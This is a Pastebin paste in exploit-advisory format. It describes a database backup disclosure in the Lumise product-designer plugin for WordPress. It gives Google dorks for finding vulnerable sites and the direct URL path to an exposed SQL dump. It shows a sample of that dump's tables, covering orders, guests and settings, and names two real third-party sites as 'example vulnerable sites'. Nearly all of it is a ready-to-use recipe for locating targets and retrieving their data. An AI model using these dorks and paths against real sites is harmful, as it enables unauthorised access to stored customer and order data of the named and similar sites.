KingSkrupellos

WordPress Lumise Plugins 4.9 Database Backup Disclosure

Dec 16th, 2018
189
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.27 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress Lumise Plugins 4.9 Database Backup Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 17/12/2018
  6. # Vendor Homepage : wordpress.org ~ sequelpro.com ~ lumise.com
  7. + codecanyon.net/category/wordpress?tags=lumise
  8. # Software Download Link : codecanyon.net/item/lumise-product-designer-woocommerce-wordpress/21222684
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Version Information : WordPress 4.7.x - 4.9.x
  12. + Compatible With : WooCommerce 3.0.x - 3.2.x
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/plugins/lumise/woo/''
  15. + intext:''Projetado por "Agência dPublicidade"''
  16. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  17. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  18. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  19.  
  20. #################################################################################################
  21.  
  22. # Admin Panel Login Path :
  23.  
  24. /wp-login.php
  25.  
  26. # Exploit :
  27.  
  28. /wp-content/plugins/lumise/woo/sample/database.txt
  29.  
  30. #################################################################################################
  31.  
  32. # Example SQL Dump Some Informations and SQL Tables Dumps =>
  33.  
  34. # ************************************************************
  35. # Sequel Pro SQL dump
  36. # Version 4541
  37. #
  38. # sequelpro.com/
  39. # github.com/sequelpro/sequelpro
  40. #
  41. # Host: 127.0.0.1 (MySQL 5.7.18)
  42. # Database: lumise
  43. ************************************************************
  44.  
  45. # Dump of table lumise_bugs
  46.  
  47. # Dump of table lumise_categories
  48.  
  49. # Dump of table lumise_categories_reference
  50.  
  51. # Dump of table lumise_cliparts
  52.  
  53. # Dump of table lumise_designs
  54.  
  55. # Dump of table lumise_fonts
  56.  
  57. # Dump of table lumise_guests
  58.  
  59. # Dump of table lumise_languages
  60.  
  61. # Dump of table lumise_order_products
  62.  
  63. # Dump of table lumise_orders
  64.  
  65. # Dump of table lumise_printings
  66.  
  67. # Dump of table lumise_products
  68.  
  69. # Dump of table lumise_settings
  70.  
  71. # Dump of table lumise_shapes
  72.  
  73. # Dump of table lumise_shares
  74.  
  75. # Dump of table lumise_tags
  76.  
  77. # Dump of table lumise_tags_reference
  78.  
  79. # Dump of table lumise_templates
  80.  
  81. # Dumping data for table `lumise_products`
  82.  
  83. # Dumping data for table `lumise_shapes`
  84.  
  85. # Dumping data for table `lumise_settings`
  86.  
  87. INSERT INTO `lumise_products` (`id`, `name`, `price`, `product`, `thumbnail`, `thumbnail_url`, `template`,
  88. `description`, `stages`, `color`, `change_color`, `attributes`, `printings`, `active`, `created`, `updated`,
  89. `order`, `size`, `orientation`) VALUES
  90.  
  91. INSERT INTO `lumise_settings` (`id`, `key`, `value`, `created`, `updated`) VALUES
  92.  
  93. #################################################################################################
  94.  
  95. # Example Vulnerable Sites =>
  96.  
  97. [+] mvmprint.bg/wp-content/plugins/lumise/woo/sample/database.txt
  98.  
  99. [+] criefacil.com/wp-content/plugins/lumise/woo/sample/database.txt
  100.  
  101. #################################################################################################
  102.  
  103. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  104.  
  105. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment